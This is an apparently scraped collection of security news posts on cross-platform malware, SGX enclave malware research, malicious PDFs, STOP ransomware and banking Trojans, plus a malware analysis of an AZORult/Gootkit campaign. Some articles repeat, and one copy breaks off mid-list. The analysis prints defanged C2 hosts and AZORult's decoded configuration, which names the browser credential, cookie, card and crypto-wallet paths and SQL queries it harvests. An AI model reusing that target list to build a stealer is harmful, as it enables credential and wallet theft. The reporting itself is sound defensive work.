These files don’t constitute the only instance of a digital threat crossing between Windows and macOS. In May 2017, for instance, Fox-IT identified a Mac OS X version of Snake malware, which traditionally targets the Windows platform. Less than a year later, security researcher Patrick Wardle of Objective-See uncovered CrossRat, a versatile threat capable of targeting Windows, macOS and Linux machines.

In a few cases, researchers have even observed attack campaigns distributing separate threats that target Windows and Mac computers. Security researchers at Microsoft came across one such instance in 2011 containing both the Mac-based Olyx backdoor and other Windows malware.

How to Defend Against Malicious EXE Files

Security professionals can help protect against adware-laden EXE files by creating security policies that limit the types of websites from which employees can download applications. They can frame this policy within the context of a larger app approval framework through which security teams follow a logical sequence to upload/review apps and ensure vendor integration. At the same time, security professionals should apply user activity analytics to a long-term data repository to sufficiently protect corporate data against digital threats like infostealers.

The post Malicious Windows EXE Files Infect macOS Users With Infostealers and Adware appeared first on Security Intelligence.

Experts found a way to create a super-malware implanted in SGX-enclaves

Researchers devised a new technique to hide malware in the security Intel SGX enclaves, making it impossible to detect by several security technologies.

Security researchers devised a new technique to hide malware in the security Intel SGX enclaves. Intel Software Guard eXtensions (SGX) is a technology for application developers that allows protecting select code and data from disclosure or modification. The Intel SGX allows application code executing within an Intel SGX enclave, which are protected areas of execution in memory.

The technique created by the experts allows them to deploy a malicious code in a memory area that is protected by design making it hard the detection.

Enclaves are designed to be protected from processes running at higher privilege levels, including the operating system, kernel, BIOS, SMM, hypervisor.

The team of researchers composed of Michael Schwarz, Samuel Weiser and Daniel Gruss of the Graz University of Technology in Austria, includes those that discovered the Spectre-Meltdown CPU vulnerabilities. They devised a method to bypass security protection and implant malware in the enclaves leveraging a benign application that uses a malicious enclave when executed.

Experts pointed out that the host application communicates with the enclave through an interface that should not allow the enclave to attack the app.

The researchers used Transactional Synchronization eXtensions (TSX), in modern Intel CPUs along with a fault-resistant read primitive technique called TSX-based Address Probing (TAP).

“Our SGX-ROP attack uses new TSX-based memory-disclosure primitive and a write-anything-anywhere primitive to construct a code reuse attack from within an enclave which is then inadvertently executed by the host application. With SGX-ROP, we bypass ASLR, stack canaries, and address sanitizer.” states the research paper published by the experts.

“We demonstrate that instead of protecting users from harm, SGX currently poses a security threat, facilitating so-called super-malware with ready-to-hit exploits.”

The experts developed a fault-resistant write primitive, Checking Located Addresses for Writability (CLAW) to determine whether it is possible to write in a memory page.

The primitive encapsulates the write instruction for the specific memory page within a TSX transaction and aborts the transaction just after the write operation.

The experts determine the possibility to write in a target memory page analyzing the return value of the transaction.

A malware injected in the enclaves could be transparent to security solutions, including Address Space Layout Randomization (ASLR), stack canaries, and address sanitizer.

“The strong confidentiality and integrity guarantees of SGX fundamentally prohibit malware inspection and analysis, when running such malware within an enclave.” continues the analysis.

“Moreover, there’s a potential threat of next-generation ransomware which securely keeps encryption keys inside the enclave and, if implemented correctly, prevents ransomware recovery tools,” the academics explain.

Intel SGX enclaves

The experts published a proof-of-concept exploit that bypassed ASLR, stack canaries, and address sanitizer, the overall exploit process took only 20.8 seconds. Hardware and software mitigations against this new attack will be implemented by Inter in future generations of CPUs.

“With SGX-ROP, we bypassed ASLR, stack canaries, and address sanitizer, to run ROP gadgets in the host context enabling practical enclave malware.” conclude the researchers.

“We conclude that instead of protecting users from harm, SGX currently poses a security threat, facilitating so-called super-malware with ready-to-hit exploits.”

Pierluigi Paganini

(SecurityAffairs – SGX enclaves, hacking)

The post Experts found a way to create a super-malware implanted in SGX-enclaves appeared first on Security Affairs.

Security Affairs: Malicious PDF Analysis

In the last few days I have done some analysis on malicious documents, especially PDF. Then I thought, “Why not turn a PDF analysis into an article?”

Let’s go to our case study:

I received a scan request for a PDF file that was reported to support an antivirus vendor, and it replied that the file was not malicious. Because the manufacturer’s analysis was not satisfactory, the team responsible for handling the incident requested a second opinion, since in other anti-virus tools the document was reported to be malicious. The team needed evidence to prove the risk involved in the file.

While conducting an initial analysis on the file, I identified that I had something suspicious:

After an analysis in the structure of objects of the PDF it is possible to identify a malicious URL that is executed during the process of opening the document, that is to say, when the user opens the file in his station it executes of conceal form the call of the URL as shown below :

When performing a domain verification it is possible to reach the IP bound to it:

When performing a URL reputation analysis, a malicious history is identified:

When performing an IP reputation analysis, a malicious history is identified:

The interesting thing is to think that years ago we would never say that infection would be possible through malicious code, URL, shellcode, through obfuscation inside documents like PDF, DOC, DOCx, XLS, XLSx and PPT. Most security tools must always be adapted to this new reality of attack and infection.

It is essential that security professionals are increasingly able to work with this type of analysis that the antivirus tool is not usually able to do, I leave here the hint about the importance of studying malicious document analysis.

About the author: Zoziel Freire

Cyber Security Analyst Content Writer of the portal: www.infosectrain.com Analyst document’s malicious CompTIA Security Analytics Professional LPIC-3 Enterprise Linux Professionals CompTIA Cybersecurity Analyst Linkedin: https://www.linkedin.com/in/zozielfreire/

Twitter: https://twitter.com/zoziel

Pierluigi Paganini

(SecurityAffairs – PDF analysis, hacking)

The post Malicious PDF Analysis appeared first on Security Affairs.



Security Affairs

Malicious PDF Analysis

In the last few days I have done some analysis on malicious documents, especially PDF. Then I thought, “Why not turn a PDF analysis into an article?”

Let’s go to our case study:

I received a scan request for a PDF file that was reported to support an antivirus vendor, and it replied that the file was not malicious. Because the manufacturer’s analysis was not satisfactory, the team responsible for handling the incident requested a second opinion, since in other anti-virus tools the document was reported to be malicious. The team needed evidence to prove the risk involved in the file.

While conducting an initial analysis on the file, I identified that I had something suspicious:

After an analysis in the structure of objects of the PDF it is possible to identify a malicious URL that is executed during the process of opening the document, that is to say, when the user opens the file in his station it executes of conceal form the call of the URL as shown below :

When performing a domain verification it is possible to reach the IP bound to it:

When performing a URL reputation analysis, a malicious history is identified:

When performing an IP reputation analysis, a malicious history is identified:

The interesting thing is to think that years ago we would never say that infection would be possible through malicious code, URL, shellcode, through obfuscation inside documents like PDF, DOC, DOCx, XLS, XLSx and PPT. Most security tools must always be adapted to this new reality of attack and infection.

It is essential that security professionals are increasingly able to work with this type of analysis that the antivirus tool is not usually able to do, I leave here the hint about the importance of studying malicious document analysis.

About the author: Zoziel Freire

Cyber Security Analyst Content Writer of the portal: www.infosectrain.com Analyst document’s malicious CompTIA Security Analytics Professional LPIC-3 Enterprise Linux Professionals CompTIA Cybersecurity Analyst Linkedin: https://www.linkedin.com/in/zozielfreire/

Twitter: https://twitter.com/zoziel

Pierluigi Paganini

(SecurityAffairs – PDF analysis, hacking)

The post Malicious PDF Analysis appeared first on Security Affairs.

Researchers Implant “Protected” Malware On Intel SGX Enclaves

Cybersecurity researchers have discovered a way to hide malicious code in Intel SGX enclaves, a hardware-based memory encryption feature in modern processors that isolates sensitive code and data to protect it from disclosure or modification. In other words, the technique allows attackers to implant malware code in a secure memory that uses protection features of SGX which are otherwise

STOP ransomware claims even more victims

Despite having been ‘in the wild’ for some weeks now, infections caused by STOP ransomware have continued to rise. Perhaps somewhat ironically, those most affected (at the moment) appear to be software pirates.

Security analysts have discovered the STOP executable is being bundled with adware installers, commonly found on websites hosting warez and software licensing cracks. As well as downloading illegal software, users may also be downloading – and installing – malware on their computer.

Much worse than adware

Although they exhibit virus-like behaviours, adware is usually more of an annoyance. But once compromised by STOP, the annoyance becomes a serious problem.

Once installed, STOP quickly encrypts all of the user’s documents, changing the filename to .djvu, .tro or .rumba. Once encrypted, the file is completely inaccessible. The malware also creates a text file (called _openme.txt) in each affected folder, explaining that the machine is infected and the user cannot access their data until they pay a ransom of $980. If the user pays within 72 hours of infection, the cost is reduced to $490.

The text file also contains a ‘personal ID’ which the hackers claim is used to generate the decryption key needed to restore access to affected files. Without decryption, the user cannot access any of their files or photos.

What if I have been infected by STOP?

Tampering with the encrypted files may permanently damage them, and the chances of guessing the correct decryption key are virtually zero. The only sure way to regain access to your data is to restore everything from backup.

Restoring data is time consuming and (sometimes) complicated – and you need a full backup of all your files and applications too. If you do not currently backup your data NOW is the time to start.

Alternatively, you could pay the ransom. Bear in mind however that you are dealing with criminals who may increase the ransom again. Or steal your money without supplying a decryption key at all.

Some technical sources suggest that STOP can be reversed, but you will need to seek advice from an expert. As always, these services are unlikely to offer any form of guarantee of success and you could still lose all your data.
Protecting against STOP ransomware infections

Preventing STOP ransomware infections is possible if you do the following:

  1. Install anti-malware protection. Panda Dome Advanced provides security tools that block STOP and other ransomware from installing on your computer. Download a free trial now to get started.
  2. Avoid warez and crack websites. Using warez to steal software is illegal – and these sites are notorious for hosting malware anyway. Paying for some software may be expensive, but it is far cheaper than losing all your files to a virus. Panda Dome can also be configured to block access to warez sites to protect you and your family.
  3. Take regular backups. Windows 10 and Mac OS both make it incredibly easy to take full backups of your machine. Once configured, your computer will take care of the rest. If something does go wrong in the future, you will have a copy of all your files ready to restore quickly.

Ransomware is very effective because it targets people who aren’t prepared. By installing anti-malware tools, checking your web surfing behaviour and performing routine data backups, you stand a very good chance of avoiding STOP infections.

Download your Antivirus

The post STOP ransomware claims even more victims appeared first on Panda Security Mediacenter.

Report: Banking Trojans Accounted for More Than Half of All Malicious Payloads in Q4 2018

A new report found that banking Trojans accounted for more than half of all malicious payloads observed in the fourth quarter of 2018.

According to the “Proofpoint Quarterly Threat Report,” this threat dominated the cyber landscape at the end of 2018, constituting 56 percent of all malicious payloads Proofpoint researchers detected.

Several new families helped banking Trojans beat out other categories of malware, including downloaders, credential stealers and remote-access Trojans (RATs), which made up 17 percent, 17 percent and 8 percent of total threats, respectively. Ransomware was barely present in Q4 2018 after spiking and quickly declining in the previous two quarters.

That being said, it’s clear that threat actors preferred to use well-known banking malware over newcomers. For example, Emotet and its botnet-like capabilities accounted for 76 percent of banking Trojan activity in the quarter; taken together, Emotet, Ursnif and Panda Banker (aka Zeus Panda) made up 97 percent of banking Trojan detections for Q4 2018.

More Active and More Sophisticated

Proofpoint’s findings help illustrate how threat actors iterated their banking Trojan use in 2018. Check Point found evidence of this trend when it observed banking Trojans increase their global impact by 50 percent between February and June of last year. In fact, the Dorkbot and Ramnit families made it onto the security firm’s “Top 10 Most Wanted Malware” list for June 2018.

Banking Trojans have also grown in sophistication more generally over the past few years. In April 2017, for instance, Proofpoint observed a large email campaign exploiting a new zero-day vulnerability to deliver the Dridex banking Trojan.

Other banking malware, including QakBot, has added wormlike features that enable it to self-propagate through shared drives and removable media. All the while, many banking Trojans increasingly conduct fileless attacks as a way of evading detection. Cisco Talos observed one such fileless campaign involving Ursnif in January 2019.

How Security Professionals Can Defend Against Banking Trojans

Security professionals can help defend their organizations against banking Trojans by using artificial intelligence technologies to move beyond rule-based security. Organizations should also consider using a unified endpoint management solution that can monitor endpoints for suspicious behavior indicative of malware and automatically uninstall any infected applications.

The post Report: Banking Trojans Accounted for More Than Half of All Malicious Payloads in Q4 2018 appeared first on Security Intelligence.

Security Affairs: Gootkit: Unveiling the Hidden Link with AZORult

Cybaze-Yoroi ZLAB revealed interesting a hidden connection between the AZORult toolkit and specific Gootkit payload.

Introduction

In the last days, a huge attack campaign hit several organizations across the Italian cyberspace, as stated on bulletin N020219 the attack waves tried to impersonate legit communication from a known Express Courier. However, a deeper analysis by Cybaze-Yoroi ZLAB revealed interesting hidden aspects, spotting a connection between the AZORult toolkit and a particular Gootkitpayload.

Technical analysis

Stage 1 – The Attached Javascript

Most of the infection attempts started with a particular email attachment: a compressed archive containing stealthy JavaScript code, most of the times able to avoid antivirus detection during the initial stages of the attack campaigns.

Hash12791e14ba82d36d434e7c7c0b81c7975ce802a430724f134b7e0cce5a7bb185
Threatmalicious js
DescObfuscated malicious JS. This download first component and keep communication with C2 server.

Table 1:  Generic information about malicious js file

This JS file is an obfuscated dropper with the purpose to download another component from a “safe” remote location:

Figure 1: Snippet from the JavaScript attachment

It contacts two distinct servers, googodsgld.]com and driverconnectsearch.]info. The behaviour of this sort of JavaScript stager is as essential as interesting: it downloads other executable code able to virtually do anything the attacker wants. This kind of pattern and the simplicity of the code itself remotely resemble the Brushaloader threat, a known dropper/stager written in VBScript and contacting its remote infrastructures in a similar manner. We can hypothesize that the malware writers may have emulated the Brushaloader stager functionalities, creating a sort of custom version exploiting the same mechanism.

Figure 2: Classic Brushaloader sample (left) along with the recent Javascript stager (right)
Figure 3: Encrypted communication with driverconnectsearch[.]info server

After the first contact attempt to googodsgld[.]com, the script communicates with the other destination and retrieves a Cabinet Archive encoded within the chunk of executable javascript code returned by driverconnectsearch[.]info. Then it stores it in “%APPDATA%\Local\Temp\”.  

As shown in Figure 3,  the first characters of the encoded payload string are “TVNDRg” which translates to “MSCF”: standard header of the Microsoft Cabinet compressed file format.

Figure 4: Javascript downloaded from diverconnectsearch[.]info server.

Stage 2 – The Cabinet

Actually, this .CAB archive is just a shell for a PE32 executable file: 

Hash2274174ed24425f41362aa207168b491e6fb55cab208116070f91c049946097a
ThreatRuntimeBroker5.exe
DescFirst component downloaded by malicious js file.

Table 2:  Generic information about RuntimeBroker5.exe (AZORult)

Executing the RuntimeBroker5.exe sample, seems it behaves as another dropper: it downloads two other components from the remote server “hairpd[.]com”.

Figure 5: RuntimeBroker5.exe process execution

The sample file actually does not perform only this downlaod. Here one of the key point of the article: it also establishes a communication channel with the AZORult C2 host “ssl.]admin.]itybuy.]it”.

The network packet exchanged with the server confirms this identification due to the known communication patterns and the dynamic analysis also shows info-stealing behaviours compatible with the identified threat. 

As shown in the following figure, the written files in “%APPDATA%\Local\Temp\” path closely match AZORult analysis described by Unit42 research group.

Figure 6: Evidence of the similarity of RuntimeBroker5.exe and AZORult malware variant analyzed by UNIT42
Figure 7: C2 Communication comparison

During the dynamic analysis, the RuntimeBroker5.exe sample received a sort of configuration file from the C2 server. We extracted it from the running malware image and decoded it:

  1. firefox.exe
  2. SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
  3. SOFTWARE\Mozilla\Mozilla Firefox
  4. SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command
  5. SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
  6. %appdata%\Mozilla\Firefox\Profiles\
  7. MozillaFireFox
  8. CurrentVersion
  9. Install_Directory
  10. nss3.dll
  11. thunderbird.exe
  12. SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
  13. SOFTWARE\Mozilla\Mozilla Thunderbird
  14. SOFTWARE\Classes\ThunderbirdEML\DefaultIcon
  15. %appdata%\Thunderbird\Profiles\
  16. ThunderBird
  17. SELECT host, path, isSecure, expiry, name, value FROM moz_cookies
  18. SELECT fieldname, value FROM moz_formhistory
  19. NSS_Init
  20. PK11_GetInternalKeySlot
  21. PK11_Authenticate
  22. PK11SDR_Decrypt
  23. NSS_Shutdown
  24. PK11_FreeSlot
  25. logins.json
  26. logins
  27. hostname
  28. timesUsed
  29. encryptedUsername
  30. encryptedPassword
  31. cookies.sqlite
  32. formhistory.sqlite
  33. %LOCALAPPDATA%\Google\Chrome\User Data\
  34. %LOCALAPPDATA%\Google\Chrome SxS\User Data\
  35. %LOCALAPPDATA%\Xpom\User Data\
  36. %LOCALAPPDATA%\Yandex\YandexBrowser\User Data\
  37. %LOCALAPPDATA%\Comodo\Dragon\User Data\
  38. %LOCALAPPDATA%\Amigo\User Data\
  39. %LOCALAPPDATA%\Orbitum\User Data\
  40. %LOCALAPPDATA%\Bromium\User Data\
  41. %LOCALAPPDATA%\Chromium\User Data\
  42. %LOCALAPPDATA%\Nichrome\User Data\
  43. %LOCALAPPDATA%\RockMelt\User Data\
  44. %LOCALAPPDATA%\360Browser\Browser\User Data\
  45. %LOCALAPPDATA%\Vivaldi\User Data\
  46. %APPDATA%\Opera Software\
  47. %LOCALAPPDATA%\Go!\User Data\
  48. %LOCALAPPDATA%\Sputnik\Sputnik\User Data\
  49. %LOCALAPPDATA%\Kometa\User Data\
  50. %LOCALAPPDATA%\uCozMedia\Uran\User Data\
  51. %LOCALAPPDATA%\QIP Surf\User Data\
  52. %LOCALAPPDATA%\Epic Privacy Browser\User Data\
  53. %APPDATA%\brave\
  54. %LOCALAPPDATA%\CocCoc\Browser\User Data\
  55. %LOCALAPPDATA%\CentBrowser\User Data\
  56. %LOCALAPPDATA%\7Star\7Star\User Data\
  57. %LOCALAPPDATA%\Elements Browser\User Data\
  58. %LOCALAPPDATA%\TorBro\Profile\
  59. %LOCALAPPDATA%\Suhba\User Data\
  60. %LOCALAPPDATA%\Safer Technologies\Secure Browser\User Data\
  61. %LOCALAPPDATA%\Rafotech\Mustang\User Data\
  62. %LOCALAPPDATA%\Superbird\User Data\
  63. %LOCALAPPDATA%\Chedot\User Data\
  64. %LOCALAPPDATA%\Torch\User Data\
  65. GoogleChrome
  66. GoogleChrome64
  67. InternetMailRu
  68. YandexBrowser
  69. ComodoDragon
  70. Amigo
  71. Orbitum
  72. Bromium
  73. Chromium
  74. Nichrome
  75. RockMelt
  76. 360Browser
  77. Vivaldi
  78. Opera
  79. GoBrowser
  80. Sputnik
  81. Kometa
  82. Uran
  83. QIPSurf
  84. Epic
  85. Brave
  86. CocCoc
  87. CentBrowser
  88. 7Star
  89. ElementsBrowser
  90. TorBro
  91. Suhba
  92. SaferBrowser
  93. Mustang
  94. Superbird
  95. Chedot
  96. Torch
  97. Login Data
  98. Web Data
  99. SELECT origin_url, username_value, password_value FROM logins
  100. SELECT host_key, name, encrypted_value, value, path, secure, (expires_utc/1000000)-11644473600 FROM cookies
  101. SELECT host_key, name, name, value, path, secure, expires_utc FROM cookies
  102. SELECT name, value FROM autofill
  103. SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted value FROM credit_cards
  104. %APPDATA%\Microsoft\Windows\Cookies\
  105. %APPDATA%\Microsoft\Windows\Cookies\Low\
  106. %LOCALAPPDATA%\Microsoft\Windows\INetCache\
  107. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\
  108. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\
  109. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\
  110. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\
  111. InternetExplorer
  112. InternetExplorerLow
  113. InternetExplorerINetCache
  114. MicrosoftEdge_AC_INetCookies
  115. MicrosoftEdge_AC_001
  116. MicrosoftEdge_AC_002
  117. MicrosoftEdge_AC
  118. Software\Microsoft\Internet Explorer
  119. Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  120. Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
  121. Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
  122. Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
  123. POP3
  124. IMAP
  125. SMTP
  126. HTTP
  127. %appdata%\Waterfox\Profiles\
  128. Waterfox
  129. %appdata%\Comodo\IceDragon\Profiles\
  130. IceDragon
  131. %appdata%\8pecxstudios\Cyberfox\Profiles\
  132. Cyberfox
  133. sqlite3_open
  134. sqlite3_close
  135. sqlite3_prepare_v2
  136. sqlite3_step
  137. sqlite3_column_text
  138. sqlite3_column_bytes
  139. sqlite3_finalize
  140. %APPDATA%\filezilla\recentservers.xml
  141. <RecentServers>
  142. </RecentServers>
  143. <Server>
  144. </Server>
  145. <Host>
  146. </Host>
  147. <Port>
  148. </Port>
  149. <User>
  150. </User>
  151. <Pass>
  152. </Pass>
  153. <Pass encoding=”base64″>
  154. FileZilla
  155. ole32.dll
  156. CLSIDFromString
  157. {4BF4C442-9B8A-41A0-B380-DD4A704DDB28}
  158. {3CCD5499-87A8-4B10-A215-608888DD3B55}
  159. vaultcli.dll
  160. VaultOpenVault
  161. VaultEnumerateItems
  162. VaultGetItem
  163. MicrosoftEdge
  164. Browsers\AutoComplete
  165. CookieList.txt
  166. SELECT host_key, name, encrypted_value, value, path, is_secure, (expires_utc/1000000)-11644473600 FROM cookies
  167. %appdata%\Moonchild Productions\Pale Moon\Profiles\
  168. PaleMoon
  169. %appdata%\Electrum\wallets\
  170. \Electrum
  171. %appdata%\Electrum-LTC\wallets\
  172. \Electrum-LTC
  173. %appdata%\ElectrumG\wallets\
  174. \ElectrumG
  175. %appdata%\Electrum-btcp\wallets\
  176. \Electrum-btcp
  177. %APPDATA%\Ethereum\keystore\
  178. \Ethereum
  179. %APPDATA%\Exodus\
  180. \Exodus
  181. \Exodus Eden
  182. *.json,*.seco
  183. %APPDATA%\Jaxx\Local Storage\
  184. \Jaxx\Local Storage\
  185. %APPDATA%\MultiBitHD\
  186. \MultiBitHD
  187. mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml
  188. .wallet
  189. wallets\.wallet
  190. wallet.dat
  191. wallets\wallet.dat
  192. electrum.dat
  193. wallets\electrum.dat
  194. Software\monero-project\monero-core
  195. wallet_path
  196. Bitcoin\Bitcoin-Qt
  197. BitcoinGold\BitcoinGold-Qt
  198. BitCore\BitCore-Qt
  199. Litecoin\Litecoin-Qt
  200. BitcoinABC\BitcoinABC-Qt
  201. %APPDATA%\Exodus Eden\
  202. %Appdata%\Psi+\profiles\
  203. %Appdata%\Psi\profiles\
  204. <roster-cache>
  205. </roster-cache>
  206. <jid type=”QString”>
  207. <password type=”QString”>
  208. </password>

Table 3: AZORult Configuration file

The multiple references to Browser Cookies and CryptoWallets confirms the “RuntimeBroker5.exe” sample, initially hidden into the cabilet archive,  is an AZORult variant.

Stage 3 – The Payload

The other file download from hairpd[.]com by AZORult’s sample is another executable PE32.

Figure 8: GET request to download the payload.
Hasha75b318eb2ae6678fd15f252d6b33919203262eb59e08ac32928f8bad54ca612
Threatsputik.exe
Descrizione BreveSecond component downloaded by malware. This component is alive after the infection.

Table 4:  Generic information about sputik.exe (Gootkit)

The “sputik.exe” uses a set of evasion techniques to avoid the monitoring of the process, such as invoking the “UuidCreateSequential” API to detect the usage of typical virtual machine’s MAC addresses, but this technique can be easily bypassed by spoofing a real network card one.

Figure 9: Evasion technique through the check “UuidCreateSequential” API call

Bypassing all the evasion techniques reveals the nature of the payload: a Gootkit malware implant.

Figure 10: Command line of the final sample

By instrumenting the execution of the implant, we were able to extract part of the JavaScript code of the malware. The Gootkit implant counts several modules written on top of NodeJS technology embedded into the PE file, revealing part of the implant code.

Figure 11: Portion of Gootkit code snippet

In the past years, Gootkit source code have been leaked online and part of it is also available on the Github platform. This way we were able to investigate differences between the extracted snippets and the known, previously leaked, malware version.

Figure 12: Comparison between extracted Gootkit version and the leaked one

As general consideration, we noticed a lot of similarities between the codes, they are perfectly compatible, but few differences holds. For instance private keys and certificates have been modified, showing the malware author choose a stronger key.

Table 5:  Certificate comparison 
(New on the left, known/leaked on the right)

Conclusion

These attack waves targeting italian organization and users revealed interesting connections between two threats we was used to monitor and detect across both the InfoSec community and the CERT-Yoroi’s constituency, revealing a hidden link connecting this particular AZORult instance and with the Gootkit implant.

Also, the analysis pointed to an evolution of the dropping techniques used in the initial stages of the attacks by cyber-criminals, showing how the usage of extremely flexible stagers written in high level languages, JavaScript in this case, is becoming more popular and needs to be carefully monitored.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis published on the Yoroi Blog.

Pierluigi Paganini

(SecurityAffairs – AZORult, gootkit)

The post Gootkit: Unveiling the Hidden Link with AZORult appeared first on Security Affairs.



Security Affairs

Gootkit: Unveiling the Hidden Link with AZORult

Cybaze-Yoroi ZLAB revealed interesting a hidden connection between the AZORult toolkit and specific Gootkit payload.

Introduction

In the last days, a huge attack campaign hit several organizations across the Italian cyberspace, as stated on bulletin N020219 the attack waves tried to impersonate legit communication from a known Express Courier. However, a deeper analysis by Cybaze-Yoroi ZLAB revealed interesting hidden aspects, spotting a connection between the AZORult toolkit and a particular Gootkitpayload.

Technical analysis

Stage 1 – The Attached Javascript

Most of the infection attempts started with a particular email attachment: a compressed archive containing stealthy JavaScript code, most of the times able to avoid antivirus detection during the initial stages of the attack campaigns.

Hash12791e14ba82d36d434e7c7c0b81c7975ce802a430724f134b7e0cce5a7bb185
Threatmalicious js
DescObfuscated malicious JS. This download first component and keep communication with C2 server.

Table 1:  Generic information about malicious js file

This JS file is an obfuscated dropper with the purpose to download another component from a “safe” remote location:

Figure 1: Snippet from the JavaScript attachment

It contacts two distinct servers, googodsgld.]com and driverconnectsearch.]info. The behaviour of this sort of JavaScript stager is as essential as interesting: it downloads other executable code able to virtually do anything the attacker wants. This kind of pattern and the simplicity of the code itself remotely resemble the Brushaloader threat, a known dropper/stager written in VBScript and contacting its remote infrastructures in a similar manner. We can hypothesize that the malware writers may have emulated the Brushaloader stager functionalities, creating a sort of custom version exploiting the same mechanism.

Figure 2: Classic Brushaloader sample (left) along with the recent Javascript stager (right)
Figure 3: Encrypted communication with driverconnectsearch[.]info server

After the first contact attempt to googodsgld[.]com, the script communicates with the other destination and retrieves a Cabinet Archive encoded within the chunk of executable javascript code returned by driverconnectsearch[.]info. Then it stores it in “%APPDATA%\Local\Temp\”.  

As shown in Figure 3,  the first characters of the encoded payload string are “TVNDRg” which translates to “MSCF”: standard header of the Microsoft Cabinet compressed file format.

Figure 4: Javascript downloaded from diverconnectsearch[.]info server.

Stage 2 – The Cabinet

Actually, this .CAB archive is just a shell for a PE32 executable file: 

Hash2274174ed24425f41362aa207168b491e6fb55cab208116070f91c049946097a
ThreatRuntimeBroker5.exe
DescFirst component downloaded by malicious js file.

Table 2:  Generic information about RuntimeBroker5.exe (AZORult)

Executing the RuntimeBroker5.exe sample, seems it behaves as another dropper: it downloads two other components from the remote server “hairpd[.]com”.

Figure 5: RuntimeBroker5.exe process execution

The sample file actually does not perform only this downlaod. Here one of the key point of the article: it also establishes a communication channel with the AZORult C2 host “ssl.]admin.]itybuy.]it”.

The network packet exchanged with the server confirms this identification due to the known communication patterns and the dynamic analysis also shows info-stealing behaviours compatible with the identified threat. 

As shown in the following figure, the written files in “%APPDATA%\Local\Temp\” path closely match AZORult analysis described by Unit42 research group.

Figure 6: Evidence of the similarity of RuntimeBroker5.exe and AZORult malware variant analyzed by UNIT42
Figure 7: C2 Communication comparison

During the dynamic analysis, the RuntimeBroker5.exe sample received a sort of configuration file from the C2 server. We extracted it from the running malware image and decoded it:

  1. firefox.exe
  2. SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
  3. SOFTWARE\Mozilla\Mozilla Firefox
  4. SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command
  5. SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
  6. %appdata%\Mozilla\Firefox\Profiles\
  7. MozillaFireFox
  8. CurrentVersion
  9. Install_Directory
  10. nss3.dll
  11. thunderbird.exe
  12. SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
  13. SOFTWARE\Mozilla\Mozilla Thunderbird
  14. SOFTWARE\Classes\ThunderbirdEML\DefaultIcon
  15. %appdata%\Thunderbird\Profiles\
  16. ThunderBird
  17. SELECT host, path, isSecure, expiry, name, value FROM moz_cookies
  18. SELECT fieldname, value FROM moz_formhistory
  19. NSS_Init
  20. PK11_GetInternalKeySlot
  21. PK11_Authenticate
  22. PK11SDR_Decrypt
  23. NSS_Shutdown
  24. PK11_FreeSlot
  25. logins.json
  26. logins
  27. hostname
  28. timesUsed
  29. encryptedUsername
  30. encryptedPassword
  31. cookies.sqlite
  32. formhistory.sqlite
  33. %LOCALAPPDATA%\Google\Chrome\User Data\
  34. %LOCALAPPDATA%\Google\Chrome SxS\User Data\
  35. %LOCALAPPDATA%\Xpom\User Data\
  36. %LOCALAPPDATA%\Yandex\YandexBrowser\User Data\
  37. %LOCALAPPDATA%\Comodo\Dragon\User Data\
  38. %LOCALAPPDATA%\Amigo\User Data\
  39. %LOCALAPPDATA%\Orbitum\User Data\
  40. %LOCALAPPDATA%\Bromium\User Data\
  41. %LOCALAPPDATA%\Chromium\User Data\
  42. %LOCALAPPDATA%\Nichrome\User Data\
  43. %LOCALAPPDATA%\RockMelt\User Data\
  44. %LOCALAPPDATA%\360Browser\Browser\User Data\
  45. %LOCALAPPDATA%\Vivaldi\User Data\
  46. %APPDATA%\Opera Software\
  47. %LOCALAPPDATA%\Go!\User Data\
  48. %LOCALAPPDATA%\Sputnik\Sputnik\User Data\
  49. %LOCALAPPDATA%\Kometa\User Data\
  50. %LOCALAPPDATA%\uCozMedia\Uran\User Data\
  51. %LOCALAPPDATA%\QIP Surf\User Data\
  52. %LOCALAPPDATA%\Epic Privacy Browser\User Data\
  53. %APPDATA%\brave\
  54. %LOCALAPPDATA%\CocCoc\Browser\User Data\
  55. %LOCALAPPDATA%\CentBrowser\User Data\
  56. %LOCALAPPDATA%\7Star\7Star\User Data\
  57. %LOCALAPPDATA%\Elements Browser\User Data\
  58. %LOCALAPPDATA%\TorBro\Profile\
  59. %LOCALAPPDATA%\Suhba\User Data\
  60. %LOCALAPPDATA%\Safer Technologies\Secure Browser\User Data\
  61. %LOCALAPPDATA%\Rafotech\Mustang\User Data\
  62. %LOCALAPPDATA%\Superbird\User Data\
  63. %LOCALAPPDATA%\Chedot\User Data\
  64. %LOCALAPPDATA%\Torch\User Data\
  65. GoogleChrome
  66. GoogleChrome64
  67. InternetMailRu
  68. YandexBrowser
  69. ComodoDragon
  70. Amigo
  71. Orbitum
  72. Bromium
  73. Chromium
  74. Nichrome
  75. RockMelt
  76. 360Browser
  77. Vivaldi
  78. Opera
  79. GoBrowser
  80. Sputnik
  81. Kometa
  82. Uran
  83. QIPSurf
  84. Epic
  85. Brave
  86. CocCoc
  87. CentBrowser
  88. 7Star
  89. ElementsBrowser
  90. TorBro
  91. Suhba
  92. SaferBrowser
  93. Mustang
  94. Superbird
  95. Chedot
  96. Torch
  97. Login Data
  98. Web Data
  99. SELECT origin_url, username_value, password_value FROM logins
